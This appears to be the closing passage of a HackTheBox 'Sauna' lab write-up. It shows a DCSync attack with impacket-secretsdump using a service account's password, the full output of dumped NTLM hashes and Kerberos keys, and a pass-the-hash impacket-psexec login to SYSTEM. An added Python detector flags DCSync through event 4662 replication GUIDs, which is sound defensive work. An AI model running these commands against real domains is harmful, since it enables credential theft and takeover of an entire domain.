[*] Building AS-REQ (w/ preauth) for: 'EGOTISTICAL-BANK.LOCAL\fsmith'
[*] Using domain controller: fe80::685d:94a3:15a2:5147%7:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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

ServiceName : krbtgt/EGOTISTICAL-BANK.LOCAL
ServiceRealm : EGOTISTICAL-BANK.LOCAL
UserName : fsmith
UserRealm : EGOTISTICAL-BANK.LOCAL
StartTime : 4/30/2026 7:08:30 AM
EndTime : 4/30/2026 5:08:30 PM
RenewTill : 5/7/2026 7:08:30 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : ByN+hXmogA98FrTMuu8b5A==
ASREP (key) : 58A52D36C84FB7F5F1BEAB9A201DB1DD

*Evil-WinRM* PS C:\Users\FSmith\Documents>

No point wasting more time here; go straight to a DCSync attack with secretsdump.

impacket-secretsdump -dc-ip 10.129.95.180 'EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #impacket-secretsdump -dc-ip 10.129.95.180 EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.129.95.180
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7b0133989569a3966019b179f44c089c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:4eb1a9dac3cfba016326537d73846e773199dc3dc3bd5c0d9000eddc0afdead3
SAUNA$:aes128-cts-hmac-sha1-96:01da32b8605ccbe020cc269dfa58e1e5
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
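What the DRSUAPI pull above looks like from the DC's side, as an added example that is not part of the original writeup: secretsdump exercises the directory replication extended rights, and with "Audit Directory Service Access" enabled the DC records that as event 4662 with Access Mask 0x100 (Control Access) and the replication GUIDs in the Properties field. The GUIDs below are the real extended-rights GUIDs; the event records, the unrelated placeholder GUID and the allowlist of DC computer accounts are constructed (SAUNA$ is this box's DC, everything else is made up).

```python
import re

# Extended-rights GUIDs that together grant directory replication (DCSync).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL,
                     DS_REPL_FILTERED_SET}

# Computer accounts that are allowed to replicate: the domain's DCs.
KNOWN_DCS = {"SAUNA$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}")


def _ev(subject, mask, props):
    """Constructed event 4662 record; field names follow the real event."""
    return {"SubjectUserName": subject, "SubjectDomainName": "EGOTISTICAL-BANK",
            "AccessMask": mask, "Properties": props}


SAMPLE_4662 = [
    # DC-to-DC replication: expected, the subject is a DC computer account.
    _ev("SAUNA$", "0x100",
        f"%%7688\n\t{{{DS_REPL_GET_CHANGES}}}\n\t{{{DS_REPL_GET_CHANGES_ALL}}}"),
    # A user account exercising the same rights: this is the DCSync.
    _ev("svc_loanmgr", "0x100",
        f"%%7688\n\t{{{DS_REPL_GET_CHANGES}}}\n\t{{{DS_REPL_GET_CHANGES_ALL}}}"),
    # Control access on some unrelated right (placeholder GUID): not replication.
    _ev("FSmith", "0x100", "%%7688\n\t{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"),
    # Ordinary write-property access (mask 0x20) is not a control-access event.
    _ev("svc_loanmgr", "0x20", "%%7688\n\t{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"),
]


def extract_guids(properties):
    """All GUIDs mentioned in a 4662 Properties field, lower-cased."""
    return set(GUID_RE.findall(properties.lower()))


def find_dcsync(events, known_dcs):
    """Return (subject, [replication GUIDs used]) for control-access events in
    which a principal other than a known DC exercised replication rights."""
    hits = []
    for e in events:
        if e["AccessMask"] != "0x100":
            continue
        rights = extract_guids(e["Properties"]) & REPLICATION_GUIDS
        if not rights:
            continue
        if e["SubjectUserName"].upper() in {d.upper() for d in known_dcs}:
            continue            # replication between DCs is normal
        hits.append((e["SubjectUserName"], sorted(rights)))
    return hits


if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_4662, KNOWN_DCS):
        print(f"DCSync by {subject}: {', '.join(rights)}")
```

Keep the DC allowlist tied to the actual DC computer accounts rather than to any name ending in "$": a compromised member-server account that has been granted replication rights would otherwise be filtered out along with the real DCs.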

┌─[root@htb-hlx1pljzsg]─[/home/skyarrow/Desktop]
└──╼ #impacket-psexec EGOTISTICAL-BANK.LOCAL/administrator@10.129.95.180 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.129.95.180.....
[*] Found writable share ADMIN$
[*] Uploading file ofuoFiAQ.exe
[*] Opening SVCManager on 10.129.95.180.....
[*] Creating service crdP on 10.129.95.180.....
[*] Starting service crdP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
56b9ce82a467af9d7bd8638c62af7869


http://example.com/2026/04/30/HackTheBox-Sauna/
Author: Skyarrow
Posted on: April 30, 2026